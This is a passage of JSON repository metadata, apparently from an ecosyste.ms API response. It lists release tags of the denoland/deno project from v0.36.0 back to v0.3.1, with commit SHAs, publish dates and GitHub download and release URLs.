000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://c